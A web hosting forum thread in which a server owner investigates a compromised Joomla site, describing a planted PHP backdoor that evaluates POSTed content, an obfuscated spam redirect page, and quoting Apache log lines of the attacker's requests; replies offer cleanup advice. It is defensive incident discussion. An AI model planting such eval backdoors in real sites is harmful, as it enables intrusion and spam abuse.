Results 1 to 5 of 5
  1. #1
    Join Date
    Dec 2009
    Posts
    58

    Info on recent hack

    This morning I found 3000 bounce messages in my spam folder. They were being sent from a script running on a customer's account. I dove into it. Keep in mind I'm kinda a linux newb.

    The customer is using Joomla (the only joomla install on my VPS)

    The script had an owner of nobody, and I did not find anything in the FTP log. Customer says he has not touched the site in a year. This tells me it was some sort of web based attack, not an account compromise.

    The script was found in /modules/mod_osdonate/elements/murmur

    There were two files in the murmur directory, one was a obfuscated html file with javascript that redirected the client to drugstorephotos.at. I found in the bounced mails, that the emails contained a link to /modules/mod_osdonate/xxx/yyy on other people's servers, so it seems to use a random link from other hacked servers.

    The other file was a obfuscated but simple php file that allowed the contents of a POST to the file to be eval'd.


    I started looking around and found this in the log:
    Code:
    71.236.157.105 - - [06/Apr/2011:15:06:47 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 23723 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; ri:1974424; InfoPath.2;  MAXTHON 2.0)"
    71.236.157.105 - - [06/Apr/2011:15:06:49 -0700] "GET /modules/mod_osdonate/reader.php HTTP/1.1" 200 88 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; ri:1974424; InfoPath.2;  MAXTHON 2.0)"
    This entry has the same timestamp as the mod_osdonate directory. It's the only one in the log with that IP, and there were no other log entries for 3 hour before and 12 hours after. The IP is a comcast IP.


    Two days later (today) I found this:
    Code:
    223.25.242.94 - - [08/Apr/2011:00:58:08 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 14067 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:09 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 11326 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:10 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 11854 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:11 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 10352 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:12 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8848 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:13 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8864 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:14 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8293 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:15 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8418 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:15 -0700] "GET /modules/mod_osdonate/elements/murmur/confidence.html HTTP/1.1" 200 1345 "-" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; eng; rv:1.8.0.5) Gecko/20060706 Firefox/2.0.0.5"
    223.25.242.94 - - [08/Apr/2011:00:58:16 -0700] "GET /modules/mod_osdonate/elements/murmur/wood.php?part=sec HTTP/1.1" 200 8 "-" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; eng; rv:1.8.0.5) Gecko/20060706 Firefox/2.0.0.5"
    223.25.242.94 - - [08/Apr/2011:01:24:38 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:24:42 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:28:14 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:28:18 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:31:48 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:31:52 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:35:18 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:35:19 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"

    The entries continue until I killed it nearly 10 hours later. IP is from Malaysia.

    So now what? Any ideas on figuring out how they got in?


    cPanel cron checks for scripts that send mail,but to me finding scripts that eval are much worse. Anyone know what script does the searching for mail (newmailcgi) in the cron so I can update it to search for eval? Or any other tips? Anyone see this before? This is my first compromise and it makes me feel like I shouldn't be running a VPS. lol.


    -Mike

  2. #2
    Join Date
    Nov 2010
    Posts
    87
    It has nothing to do with VPS security. Your VPS is probably just fine. The problem is with Joomla. Have you checked your client's site for bad permissions, exploits, old Joomla verions etc.?

  3. #3
    @turbo2ltr erase the malicious script or consider a fresh reinstall of Joomla.Tell your customer that he must use strong ftp passwords.Furthermore install Clamav on the server and perform a recursive scanning of directories.Cheers.

  4. #4
    It appears the compromised module is:
    http://joomlaguru.com.np/documentati.../osdonate.html

    I got the same link in a spam email, linking to /modules/mod_osdonate/bookmark.php The thing is the compromised website (a small static info site for a brick-and-mortar business) had no donate buttons anywhere. So I'm not sure if this module has been on there before and was then exploited or if the hack injected this module or code disguised as this module.

  5. #5
    Join Date
    Dec 2009
    Posts
    58
    I reached out the the makers of osdonate to see if the module was compromised or if it was just completely replaced and just using the name, but they never got back to me. My customer wasn't using it either.

Similar Threads

  1. Replies: 1
    Last Post: 12-27-2008, 03:21 AM
  2. Br0keN-Pr0xy hack - FIX (the popular index defacement hack)
    By layer0 in forum Hosting Security and Technology Tutorials
    Replies: 5
    Last Post: 09-09-2006, 01:23 PM
  3. Any recent info on Fatnetwork.net
    By hobzip in forum Reseller Hosting
    Replies: 7
    Last Post: 06-28-2005, 10:16 PM
  4. recent hack
    By name2me in forum Dedicated Server
    Replies: 17
    Last Post: 04-19-2005, 10:48 AM
  5. Recent Credit Card Hack?
    By tbroeker in forum Web Hosting
    Replies: 2
    Last Post: 02-12-2004, 06:35 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •